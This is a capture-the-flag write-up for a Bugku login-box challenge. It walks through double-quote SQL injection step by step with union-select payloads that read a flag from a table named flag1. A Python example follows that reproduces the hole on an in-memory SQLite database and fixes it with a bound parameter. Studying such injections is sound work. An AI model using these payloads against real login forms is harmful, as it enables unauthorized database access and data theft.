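WP-Bugku-This Is a Magical Login Box

Challenge URL: http://120.24.86.145:9001/sql/

Look for the injection point: submitting 1" (a double quote) makes the page return an error, so the input ends up inside a double-quoted string in the query.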

Use order by to determine the number of columns:
1"order by 1,2,3--

Find the tables:
1" union select group_concat(table_name),2 from information_schema.tables where table_schema=database()--

From the message returned, we get the tables flag1 and whoami.

Next, find the columns:
1" union select group_concat(column_name),2 from information_schema.columns where table_name='flag1'--

Read the field:
1" union select flag1,2 from flag1--

This gives Login_Name:ed6b28e684817d9efcaf802979e57aea

flag{ed6b28e684817d9efcaf802979e57aea}
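
Why the double quote breaks the query and how a bound parameter closes the hole, as an added example that is not part of the original write-up or the challenge's code. Assumptions: an in-memory SQLite database stands in for the challenge's backend (relying on SQLite's default acceptance of double-quoted string literals), the `users` table and its columns are hypothetical, and the stored values are constructed.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the challenge database."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (name TEXT, pass TEXT);   -- hypothetical login table
        INSERT INTO users VALUES ('admin', 'constructed-pass');
        CREATE TABLE flag1 (flag1 TEXT);             -- table/column named on the page
        INSERT INTO flag1 VALUES ('constructed-secret');
    """)
    return db

def lookup_concat(db, name):
    # Vulnerable: the input is pasted between double quotes, so a " in the
    # input closes the string and the rest is parsed as SQL.
    sql = 'SELECT name, pass FROM users WHERE name = "' + name + '"'
    return db.execute(sql).fetchall()

def lookup_param(db, name):
    # Hardened: the input is bound as a value and never parsed as SQL.
    return db.execute(
        "SELECT name, pass FROM users WHERE name = ?", (name,)
    ).fetchall()

def raises_sql_error(db, name):
    # A lone " leaves the string unterminated: the error seen in the write-up.
    try:
        lookup_concat(db, name)
    except sqlite3.OperationalError:
        return True
    return False

if __name__ == "__main__":
    db = make_db()
    payload = '1" union select flag1,2 from flag1--'  # string from the write-up
    print(raises_sql_error(db, '1"'))   # syntax error on the concatenated query
    print(lookup_concat(db, payload))   # rows from flag1 leak through the UNION
    print(lookup_param(db, payload))    # no rows: payload is only a name to compare
    print(lookup_param(db, "admin"))    # normal lookups still work
```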
